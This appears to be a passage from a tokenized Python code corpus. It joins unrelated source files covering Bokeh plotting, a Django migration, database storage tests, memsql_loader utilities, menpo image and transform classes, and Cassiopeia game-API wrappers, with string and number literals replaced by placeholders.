[ : self . num_urls ] <EOL> active_x = x [ : self . num_urls ] <EOL> active_urls = urls [ : self . 
num_urls ] <EOL> min_x = min ( active_x0 ) <EOL> plot . x_range . start = min_x <EOL> plot . x_range . end = np . datetime64 ( datetime . now ( ) ) <EOL> plot . y_range . factors = active_urls <EOL> for r in plot . renderers : <EOL> if type ( r ) == Grid : <EOL> r . grid_line_color = '<STR_LIT>' <EOL> break <EOL> plot . right [ <NUM_LIT:0> ] . minor_tick_line_color = '<STR_LIT>' <EOL> plot . right [ <NUM_LIT:0> ] . major_tick_line_color = '<STR_LIT>' <EOL> plot . right [ <NUM_LIT:0> ] . major_label_text_font_size = '<STR_LIT>' <EOL> plot . below [ <NUM_LIT:0> ] . minor_tick_line_color = '<STR_LIT>' <EOL> plot . below [ <NUM_LIT:0> ] . major_tick_line_color = '<STR_LIT>' <EOL> plot . below [ <NUM_LIT:0> ] . major_label_text_font_size = '<STR_LIT>' <EOL> if self . old_circles : <EOL> plot . renderers . pop ( ) <EOL> self . old_circles = None <EOL> if self . old_segments : <EOL> plot . renderers . pop ( ) <EOL> self . old_segments = None <EOL> segment_source = ColumnDataSource ( dict ( x0 = active_x0 , <EOL> x1 = active_x , <EOL> urls = active_urls ) ) <EOL> self . old_segments = Segment ( x0 = "<STR_LIT>" , y0 = "<STR_LIT>" , x1 = "<STR_LIT>" , y1 = "<STR_LIT>" , line_color = "<STR_LIT>" , line_width = <NUM_LIT:10> ) <EOL> plot . add_glyph ( segment_source , self . old_segments ) <EOL> if self . closed_urls and PLOT_CIRCLES : <EOL> active_circles = circles [ : self . num_urls ] <EOL> active_circle_urls = circle_urls [ : self . num_urls ] <EOL> circle_source = ColumnDataSource ( dict ( x = active_circles , urls = active_circle_urls ) ) <EOL> self . old_circles = Circle ( x = "<STR_LIT:x>" , y = "<STR_LIT>" , size = <NUM_LIT:12> , fill_color = "<STR_LIT>" , line_color = "<STR_LIT>" , line_width = <NUM_LIT:2> ) <EOL> plot . add_glyph ( circle_source , self . old_circles ) <EOL> self . session . store_document ( self . document , dirty_only = False ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( default = <NUM_LIT:0> ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( ) ) , <EOL> ( '<STR_LIT>' , models . OneToOneField ( null = True , default = None , blank = True , to = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:index>' , models . OneToOneField ( null = True , default = None , blank = True , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import gludb . config <EOL> from simple_data_tests import SimpleStorage , DefaultStorageTesting <EOL> from index_tests import IndexReadWriteTesting , IndexedData <EOL> class SpecificStorageTesting ( DefaultStorageTesting ) : <EOL> def setUp ( self ) : <EOL> gludb . config . default_database ( None ) <EOL> gludb . config . class_database ( SimpleStorage , gludb . config . Database ( <EOL> '<STR_LIT>' <EOL> ) ) <EOL> SimpleStorage . ensure_table ( ) <EOL> def tearDown ( self ) : <EOL> gludb . backends . dynamodb . delete_table ( <EOL> SimpleStorage . get_table_name ( ) <EOL> ) <EOL> gludb . config . clear_database_config ( ) <EOL> class DynamoDBIndexReadWriteTesting ( IndexReadWriteTesting ) : <EOL> def setUp ( self ) : <EOL> gludb . config . default_database ( gludb . config . Database ( '<STR_LIT>' ) ) <EOL> IndexedData . ensure_table ( ) <EOL> def tearDown ( self ) : <EOL> gludb . backends . dynamodb . delete_table ( <EOL> IndexedData . get_table_name ( ) <EOL> ) <EOL> gludb . config . clear_database_config ( ) </s>
<s> import sys , datetime <EOL> from clark . super_enum import SuperEnum <EOL> from memsql_loader . util . command import Command <EOL> from memsql_loader . util import log , super_json as json <EOL> from memsql_loader . api import exceptions <EOL> from memsql_loader . api . job import Job as JobApi <EOL> from memsql_loader . api . tasks import Tasks as TasksApi <EOL> class Job ( Command ) : <EOL> @ staticmethod <EOL> def configure ( parser , subparsers ) : <EOL> subparser = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> subparser . set_defaults ( command = Job ) <EOL> subparser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> subparser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , default = False , <EOL> help = '<STR_LIT>' ) <EOL> def run ( self ) : <EOL> self . logger = log . get_logger ( '<STR_LIT>' ) <EOL> self . job_api = JobApi ( ) <EOL> self . tasks_api = TasksApi ( ) <EOL> try : <EOL> result = self . job_api . query ( { '<STR_LIT>' : self . options . job_id } ) <EOL> except exceptions . ApiException as e : <EOL> print e . message <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if self . options . spec : <EOL> print json . dumps ( result . spec , sort_keys = True , indent = <NUM_LIT:4> * '<STR_LIT:U+0020>' ) <EOL> else : <EOL> try : <EOL> finished_tasks = self . tasks_api . query ( { <EOL> '<STR_LIT>' : self . options . job_id , <EOL> '<STR_LIT:state>' : '<STR_LIT>' <EOL> } ) <EOL> except exceptions . ApiException as e : <EOL> print e . message <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> files_loaded = len ( finished_tasks ) <EOL> rows_loaded = reduce ( lambda x , y : x + y . get ( '<STR_LIT:data>' , { } ) . get ( '<STR_LIT>' , <NUM_LIT:0> ) , finished_tasks , <NUM_LIT:0> ) <EOL> avg_rows_per_file = None <EOL> avg_rows_per_second = None <EOL> if files_loaded > <NUM_LIT:0> : <EOL> avg_rows_per_file = rows_loaded / files_loaded <EOL> min_start_time = datetime . datetime . max <EOL> max_stop_time = datetime . datetime . 
min <EOL> for row in finished_tasks : <EOL> for step in row . steps : <EOL> if step [ '<STR_LIT:name>' ] == '<STR_LIT>' : <EOL> min_start_time = min ( min_start_time , step [ '<STR_LIT:start>' ] ) <EOL> max_stop_time = max ( max_stop_time , step [ '<STR_LIT>' ] ) <EOL> break <EOL> else : <EOL> continue <EOL> avg_rows_per_second = rows_loaded / ( max_stop_time - min_start_time ) . total_seconds ( ) <EOL> result [ '<STR_LIT>' ] = { k : v for k , v in { <EOL> '<STR_LIT>' : files_loaded , <EOL> '<STR_LIT>' : rows_loaded , <EOL> '<STR_LIT>' : avg_rows_per_file , <EOL> '<STR_LIT>' : avg_rows_per_second <EOL> } . iteritems ( ) if v is not None } <EOL> if result . tasks_total > <NUM_LIT:0> : <EOL> result [ '<STR_LIT>' ] . update ( { <EOL> '<STR_LIT>' : result . tasks_succeeded * <NUM_LIT:1.0> / result . tasks_total , <EOL> '<STR_LIT>' : result . tasks_errored * <NUM_LIT:1.0> / result . tasks_total <EOL> } ) <EOL> result [ "<STR_LIT>" ] = result . spec [ "<STR_LIT:target>" ] [ "<STR_LIT>" ] <EOL> result [ "<STR_LIT>" ] = result . spec [ "<STR_LIT:target>" ] [ "<STR_LIT>" ] <EOL> result = dict ( result ) <EOL> del result [ '<STR_LIT>' ] <EOL> result = { k : str ( v ) if isinstance ( v , SuperEnum . Element ) else v for k , v in result . iteritems ( ) } <EOL> print json . dumps ( result , sort_keys = True , indent = <NUM_LIT:4> * '<STR_LIT:U+0020>' ) </s>
<s> from memsql_loader . util import apsw_helpers <EOL> class TableDefinition ( object ) : <EOL> def __init__ ( self , table_name , sql , index_columns = None ) : <EOL> self . table_name = table_name <EOL> self . sql = sql <EOL> self . index_columns = index_columns or [ ] <EOL> class APSWSQLUtility ( object ) : <EOL> def __init__ ( self , storage ) : <EOL> self . storage = storage <EOL> self . _tables = { } <EOL> def setup ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . storage . transaction ( ) as cursor : <EOL> for table_defn in self . _tables . values ( ) : <EOL> cursor . execute ( table_defn . sql ) <EOL> for index_column in table_defn . index_columns : <EOL> index_name = table_defn . table_name + '<STR_LIT:_>' + index_column + '<STR_LIT>' <EOL> cursor . execute ( <EOL> '<STR_LIT>' % <EOL> ( index_name , table_defn . table_name , index_column ) ) <EOL> return self <EOL> def ready ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . storage . cursor ( ) as cursor : <EOL> rows = apsw_helpers . query ( <EOL> cursor , '<STR_LIT>' ) <EOL> tables = [ row . name for row in rows ] <EOL> return all ( [ table_name in tables for table_name in self . _tables ] ) <EOL> def _define_table ( self , table_definition ) : <EOL> self . _tables [ table_definition . table_name ] = table_definition </s>
<s> import ref_prettify </s>
<s> import numpy as np <EOL> from nose . tools import raises <EOL> from numpy . testing import assert_allclose <EOL> from menpo . shape import PointCloud <EOL> from menpo . image import MaskedImage , BooleanImage <EOL> def test_constrain_mask_to_landmarks_pwa ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img . landmarks [ '<STR_LIT>' ] = PointCloud ( np . array ( [ [ <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , [ <NUM_LIT> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:0.0> , <NUM_LIT> ] ] ) ) <EOL> img . constrain_mask_to_landmarks ( group = '<STR_LIT>' ) <EOL> example_mask = BooleanImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , fill = False ) <EOL> example_mask . pixels [ <NUM_LIT:0> , : <NUM_LIT:6> , : <NUM_LIT:6> ] = True <EOL> assert ( img . mask . n_true ( ) == <NUM_LIT> ) <EOL> assert_allclose ( img . mask . pixels , example_mask . pixels ) <EOL> def test_constrain_mask_to_landmarks_pwa_batched ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img . landmarks [ '<STR_LIT>' ] = PointCloud ( np . array ( [ [ <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , [ <NUM_LIT> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:0.0> , <NUM_LIT> ] ] ) ) <EOL> img . constrain_mask_to_landmarks ( group = '<STR_LIT>' , batch_size = <NUM_LIT:2> ) <EOL> example_mask = BooleanImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , fill = False ) <EOL> example_mask . pixels [ <NUM_LIT:0> , : <NUM_LIT:6> , : <NUM_LIT:6> ] = True <EOL> assert ( img . mask . n_true ( ) == <NUM_LIT> ) <EOL> assert_allclose ( img . mask . pixels , example_mask . pixels ) <EOL> def test_constrain_mask_to_landmarks_convex_hull ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img . landmarks [ '<STR_LIT>' ] = PointCloud ( np . array ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> ] , [ <NUM_LIT> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:0.> , <NUM_LIT> ] ] ) ) <EOL> img . 
constrain_mask_to_landmarks ( group = '<STR_LIT>' , <EOL> point_in_pointcloud = '<STR_LIT>' ) <EOL> example_mask = BooleanImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , fill = False ) <EOL> example_mask . pixels [ <NUM_LIT:0> , : <NUM_LIT:6> , <NUM_LIT:1> : <NUM_LIT:6> ] = True <EOL> assert ( img . mask . n_true ( ) == <NUM_LIT:30> ) <EOL> assert_allclose ( img . mask . pixels , example_mask . pixels ) <EOL> def test_constrain_mask_to_landmarks_callable ( ) : <EOL> def bounding_box ( _ , indices ) : <EOL> return np . ones ( indices . shape [ <NUM_LIT:0> ] , dtype = np . bool ) <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img . landmarks [ '<STR_LIT>' ] = PointCloud ( np . array ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> ] , [ <NUM_LIT> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:0.> , <NUM_LIT> ] ] ) ) <EOL> img . constrain_mask_to_landmarks ( group = '<STR_LIT>' , <EOL> point_in_pointcloud = bounding_box ) <EOL> example_mask = BooleanImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , fill = False ) <EOL> example_mask . pixels [ <NUM_LIT:0> , : <NUM_LIT:6> , : <NUM_LIT:6> ] = True <EOL> assert ( img . mask . n_true ( ) == <NUM_LIT> ) <EOL> assert_allclose ( img . mask . pixels , example_mask . pixels ) <EOL> @ raises ( ValueError ) <EOL> def test_constrain_mask_to_landmarks_non_2d ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img . landmarks [ '<STR_LIT>' ] = PointCloud ( np . array ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] ) ) <EOL> img . constrain_mask_to_landmarks ( ) <EOL> @ raises ( ValueError ) <EOL> def test_constrain_mask_to_landmarks_unknown_key ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img . landmarks [ '<STR_LIT>' ] = PointCloud ( np . array ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] ) ) <EOL> img . 
constrain_mask_to_landmarks ( point_in_pointcloud = '<STR_LIT>' ) <EOL> def test_erode ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img2 = img . erode ( ) <EOL> assert ( img2 . mask . n_true ( ) == <NUM_LIT:64> ) <EOL> img3 = img . erode ( n_pixels = <NUM_LIT:3> ) <EOL> assert ( img3 . mask . n_true ( ) == <NUM_LIT:16> ) <EOL> def test_dilate ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img = img . erode ( n_pixels = <NUM_LIT:3> ) <EOL> img2 = img . dilate ( ) <EOL> assert ( img2 . mask . n_true ( ) == <NUM_LIT:32> ) <EOL> img3 = img . dilate ( n_pixels = <NUM_LIT:3> ) <EOL> assert ( img3 . mask . n_true ( ) == <NUM_LIT> ) <EOL> def test_init_from_rolled_channels ( ) : <EOL> p = np . empty ( [ <NUM_LIT:50> , <NUM_LIT> , <NUM_LIT:3> ] ) <EOL> im = MaskedImage . init_from_rolled_channels ( p ) <EOL> assert im . n_channels == <NUM_LIT:3> <EOL> assert im . height == <NUM_LIT:50> <EOL> assert im . width == <NUM_LIT> <EOL> def test_init_from_rolled_channels_masked ( ) : <EOL> p = np . empty ( [ <NUM_LIT:50> , <NUM_LIT> , <NUM_LIT:3> ] ) <EOL> example_mask = BooleanImage . init_blank ( ( <NUM_LIT:50> , <NUM_LIT> ) , fill = False ) <EOL> example_mask . pixels [ <NUM_LIT:0> , : <NUM_LIT:6> , : <NUM_LIT:6> ] = True <EOL> im = MaskedImage . init_from_rolled_channels ( p , mask = example_mask ) <EOL> assert im . n_channels == <NUM_LIT:3> <EOL> assert im . height == <NUM_LIT:50> <EOL> assert im . width == <NUM_LIT> <EOL> assert im . mask . n_true ( ) == <NUM_LIT> </s>
<s> from . base import LandmarkGroup , LandmarkManager , Landmarkable <EOL> from . exceptions import LabellingError <EOL> from . labels import * </s>
<s> from . pointcloud import PointCloud , bounding_box <EOL> from . mesh import TriMesh , ColouredTriMesh , TexturedTriMesh <EOL> from . groupops import mean_pointcloud <EOL> from . graph import ( UndirectedGraph , DirectedGraph , Tree , PointUndirectedGraph , <EOL> PointDirectedGraph , PointTree ) <EOL> from . graph_predefined import ( empty_graph , star_graph , complete_graph , <EOL> chain_graph , delaunay_graph ) </s>
<s> import numpy as np <EOL> from . base import Homogeneous , HomogFamilyAlignment <EOL> from functools import reduce <EOL> class Affine ( Homogeneous ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , h_matrix , copy = True , skip_checks = False ) : <EOL> Homogeneous . __init__ ( self , h_matrix , copy = copy , <EOL> skip_checks = skip_checks ) <EOL> @ classmethod <EOL> def init_identity ( cls , n_dims ) : <EOL> r"""<STR_LIT>""" <EOL> return cls ( np . eye ( n_dims + <NUM_LIT:1> ) , copy = False , skip_checks = True ) <EOL> @ property <EOL> def h_matrix ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return self . _h_matrix <EOL> def _set_h_matrix ( self , value , copy = True , skip_checks = False ) : <EOL> r"""<STR_LIT>""" <EOL> if not skip_checks : <EOL> shape = value . shape <EOL> if len ( shape ) != <NUM_LIT:2> or shape [ <NUM_LIT:0> ] != shape [ <NUM_LIT:1> ] : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . h_matrix is not None : <EOL> if self . n_dims != shape [ <NUM_LIT:0> ] - <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if shape [ <NUM_LIT:0> ] - <NUM_LIT:1> not in [ <NUM_LIT:2> , <NUM_LIT:3> ] : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if not ( np . allclose ( value [ - <NUM_LIT:1> , : - <NUM_LIT:1> ] , <NUM_LIT:0> ) and <EOL> np . allclose ( value [ - <NUM_LIT:1> , - <NUM_LIT:1> ] , <NUM_LIT:1> ) ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if copy : <EOL> value = value . copy ( ) <EOL> self . _h_matrix = value <EOL> @ property <EOL> def linear_component ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return self . h_matrix [ : - <NUM_LIT:1> , : - <NUM_LIT:1> ] <EOL> @ property <EOL> def translation_component ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return self . h_matrix [ : - <NUM_LIT:1> , - <NUM_LIT:1> ] <EOL> def decompose ( self ) : <EOL> r"""<STR_LIT>""" <EOL> from . rotation import Rotation <EOL> from . translation import Translation <EOL> from . scale import Scale <EOL> U , S , V = np . 
linalg . svd ( self . linear_component ) <EOL> rotation_2 = Rotation ( U ) <EOL> rotation_1 = Rotation ( V ) <EOL> scale = Scale ( S ) <EOL> translation = Translation ( self . translation_component ) <EOL> return [ rotation_1 , scale , rotation_2 , translation ] <EOL> def _transform_str ( self ) : <EOL> r"""<STR_LIT>""" <EOL> header = '<STR_LIT>' <EOL> list_str = [ t . _transform_str ( ) for t in self . decompose ( ) ] <EOL> return header + reduce ( lambda x , y : x + '<STR_LIT:\n>' + '<STR_LIT:U+0020>' + y , list_str , '<STR_LIT:U+0020>' ) <EOL> def _apply ( self , x , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> return np . dot ( x , self . linear_component . T ) + self . translation_component <EOL> @ property <EOL> def n_parameters ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return self . n_dims * ( self . n_dims + <NUM_LIT:1> ) <EOL> def _as_vector ( self ) : <EOL> r"""<STR_LIT>""" <EOL> params = self . h_matrix - np . eye ( self . n_dims + <NUM_LIT:1> ) <EOL> return params [ : self . n_dims , : ] . ravel ( order = '<STR_LIT:F>' ) <EOL> def _from_vector_inplace ( self , p ) : <EOL> r"""<STR_LIT>""" <EOL> h_matrix = None <EOL> if p . shape [ <NUM_LIT:0> ] == <NUM_LIT:6> : <EOL> h_matrix = np . eye ( <NUM_LIT:3> ) <EOL> h_matrix [ : <NUM_LIT:2> , : ] += p . reshape ( ( <NUM_LIT:2> , <NUM_LIT:3> ) , order = '<STR_LIT:F>' ) <EOL> elif p . shape [ <NUM_LIT:0> ] == <NUM_LIT:12> : <EOL> h_matrix = np . eye ( <NUM_LIT:4> ) <EOL> h_matrix [ : <NUM_LIT:3> , : ] += p . reshape ( ( <NUM_LIT:3> , <NUM_LIT:4> ) , order = '<STR_LIT:F>' ) <EOL> else : <EOL> ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _set_h_matrix ( h_matrix , copy = False , skip_checks = True ) <EOL> @ property <EOL> def composes_inplace_with ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return Affine <EOL> class AlignmentAffine ( HomogFamilyAlignment , Affine ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , source , target ) : <EOL> HomogFamilyAlignment . 
__init__ ( self , source , target ) <EOL> optimal_h = self . _build_alignment_h_matrix ( source , target ) <EOL> Affine . __init__ ( self , optimal_h , copy = False , skip_checks = True ) <EOL> @ staticmethod <EOL> def _build_alignment_h_matrix ( source , target ) : <EOL> r"""<STR_LIT>""" <EOL> a = source . h_points ( ) <EOL> b = target . h_points ( ) <EOL> return np . linalg . solve ( np . dot ( a , a . T ) , np . dot ( a , b . T ) ) . T <EOL> def _set_h_matrix ( self , value , copy = True , skip_checks = False ) : <EOL> r"""<STR_LIT>""" <EOL> Affine . _set_h_matrix ( self , value , copy = copy , skip_checks = skip_checks ) <EOL> self . _sync_target_from_state ( ) <EOL> def _sync_state_from_target ( self ) : <EOL> optimal_h = self . _build_alignment_h_matrix ( self . source , self . target ) <EOL> Affine . _set_h_matrix ( self , optimal_h , copy = False , skip_checks = True ) <EOL> def as_non_alignment ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return Affine ( self . h_matrix , skip_checks = True ) <EOL> class DiscreteAffine ( object ) : <EOL> r"""<STR_LIT>""" <EOL> def decompose ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return [ self . copy ( ) ] </s>
<s> import numpy as np <EOL> from . base import Transform , Alignment , Invertible <EOL> from . rbf import R2LogR2RBF <EOL> class ThinPlateSplines ( Alignment , Transform , Invertible ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , source , target , kernel = None , min_singular_val = <NUM_LIT> ) : <EOL> Alignment . __init__ ( self , source , target ) <EOL> if self . n_dims != <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if kernel is None : <EOL> kernel = R2LogR2RBF ( source . points ) <EOL> self . min_singular_val = min_singular_val <EOL> self . kernel = kernel <EOL> self . k = self . kernel . apply ( self . source . points ) <EOL> self . p = np . concatenate ( <EOL> [ np . ones ( [ self . n_points , <NUM_LIT:1> ] ) , self . source . points ] , axis = <NUM_LIT:1> ) <EOL> o = np . zeros ( [ <NUM_LIT:3> , <NUM_LIT:3> ] ) <EOL> top_l = np . concatenate ( [ self . k , self . p ] , axis = <NUM_LIT:1> ) <EOL> bot_l = np . concatenate ( [ self . p . T , o ] , axis = <NUM_LIT:1> ) <EOL> self . l = np . concatenate ( [ top_l , bot_l ] , axis = <NUM_LIT:0> ) <EOL> self . v , self . y , self . coefficients = None , None , None <EOL> self . _build_coefficients ( ) <EOL> def _build_coefficients ( self ) : <EOL> self . v = self . target . points . T . copy ( ) <EOL> self . y = np . hstack ( [ self . v , np . zeros ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) ] ) <EOL> _u , _s , _v = np . linalg . svd ( self . l ) <EOL> keep = _s . shape [ <NUM_LIT:0> ] - sum ( _s < self . min_singular_val ) <EOL> inv_l = _u [ : , : keep ] . dot ( <NUM_LIT:1.0> / _s [ : keep , None ] * _v [ : keep , : ] ) <EOL> self . coefficients = inv_l . dot ( self . y . T ) <EOL> def _sync_state_from_target ( self ) : <EOL> self . _build_coefficients ( ) <EOL> def _apply ( self , points , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> if points . shape [ <NUM_LIT:1> ] != self . n_dims : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> x = points [ ... , <NUM_LIT:0> ] [ : , None ] <EOL> y = points [ ... 
, <NUM_LIT:1> ] [ : , None ] <EOL> c_affine_c = self . coefficients [ - <NUM_LIT:3> ] <EOL> c_affine_x = self . coefficients [ - <NUM_LIT:2> ] <EOL> c_affine_y = self . coefficients [ - <NUM_LIT:1> ] <EOL> f_affine = c_affine_c + c_affine_x * x + c_affine_y * y <EOL> kernel_dist = self . kernel . apply ( points ) <EOL> c_affine_free = self . coefficients [ : - <NUM_LIT:3> ] <EOL> f_affine_free = kernel_dist . dot ( c_affine_free ) <EOL> return f_affine + f_affine_free <EOL> @ property <EOL> def has_true_inverse ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return False <EOL> def pseudoinverse ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return ThinPlateSplines ( self . target , self . source , kernel = self . kernel ) </s>
<s> import cassiopeia . dto . requests <EOL> import cassiopeia . type . core . common <EOL> import cassiopeia . type . dto . currentgame <EOL> import cassiopeia . type . api . exception <EOL> def get_current_game ( summoner_id ) : <EOL> """<STR_LIT>""" <EOL> region = cassiopeia . type . core . common . Region ( cassiopeia . dto . requests . region ) <EOL> platform = cassiopeia . type . core . common . Platform [ region . name ] <EOL> request = "<STR_LIT>" . format ( server = cassiopeia . dto . requests . region , platform = platform . value , summoner_id = summoner_id ) <EOL> try : <EOL> return cassiopeia . type . dto . currentgame . CurrentGameInfo ( cassiopeia . dto . requests . get ( request , include_base = False ) ) <EOL> except cassiopeia . type . api . exception . APIError as e : <EOL> if e . error_code == <NUM_LIT> : <EOL> return None <EOL> raise e </s>
<s> import datetime <EOL> import cassiopeia . type . core . common <EOL> import cassiopeia . type . dto . status <EOL> @ cassiopeia . type . core . common . inheritdocs <EOL> class Shard ( cassiopeia . type . core . common . CassiopeiaObject ) : <EOL> dto_type = cassiopeia . type . dto . status . Shard <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ property <EOL> def host_name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . hostname <EOL> @ property <EOL> def locales ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . locales <EOL> @ property <EOL> def name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . name <EOL> @ property <EOL> def platform ( self ) : <EOL> """<STR_LIT>""" <EOL> return cassiopeia . type . core . common . Platform ( self . data . region_tag . upper ( ) ) if self . data . region_tag else None <EOL> @ property <EOL> def region ( self ) : <EOL> """<STR_LIT>""" <EOL> return cassiopeia . type . core . common . Region ( self . data . slug . upper ( ) ) if self . data . slug else None <EOL> @ cassiopeia . type . core . common . inheritdocs <EOL> class ShardStatus ( cassiopeia . type . core . common . CassiopeiaObject ) : <EOL> dto_type = cassiopeia . type . dto . status . ShardStatus <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" . format ( name = self . name ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . services ) <EOL> def __len__ ( self ) : <EOL> return len ( self . services ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . services [ index ] <EOL> @ property <EOL> def host_name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . hostname <EOL> @ property <EOL> def locales ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . locales <EOL> @ property <EOL> def name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . name <EOL> @ property <EOL> def platform ( self ) : <EOL> """<STR_LIT>""" <EOL> return cassiopeia . type . core . common . 
Platform ( self . data . region_tag . upper ( ) ) if self . data . region_tag else None <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def services ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ Service ( service ) for service in self . data . services ] <EOL> @ property <EOL> def region ( self ) : <EOL> """<STR_LIT>""" <EOL> return cassiopeia . type . core . common . Region ( self . data . slug . upper ( ) ) if self . data . slug else None <EOL> @ cassiopeia . type . core . common . inheritdocs <EOL> class Service ( cassiopeia . type . core . common . CassiopeiaObject ) : <EOL> dto_type = cassiopeia . type . dto . status . Service <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> def __iter__ ( self ) : <EOL> return iter ( self . incidents ) <EOL> def __len__ ( self ) : <EOL> return len ( self . incidents ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . incidents [ index ] <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def incidents ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ Incident ( incident ) for incident in self . data . incidents ] <EOL> @ property <EOL> def name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . name <EOL> @ property <EOL> def slug ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . slug <EOL> @ property <EOL> def status ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . status <EOL> @ cassiopeia . type . core . common . inheritdocs <EOL> class Incident ( cassiopeia . type . core . common . CassiopeiaObject ) : <EOL> dto_type = cassiopeia . type . dto . status . Incident <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" . format ( id_ = self . id ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . updates ) <EOL> def __len__ ( self ) : <EOL> return len ( self . updates ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . updates [ index ] <EOL> def __eq__ ( self , other ) : <EOL> return self . id == other . 
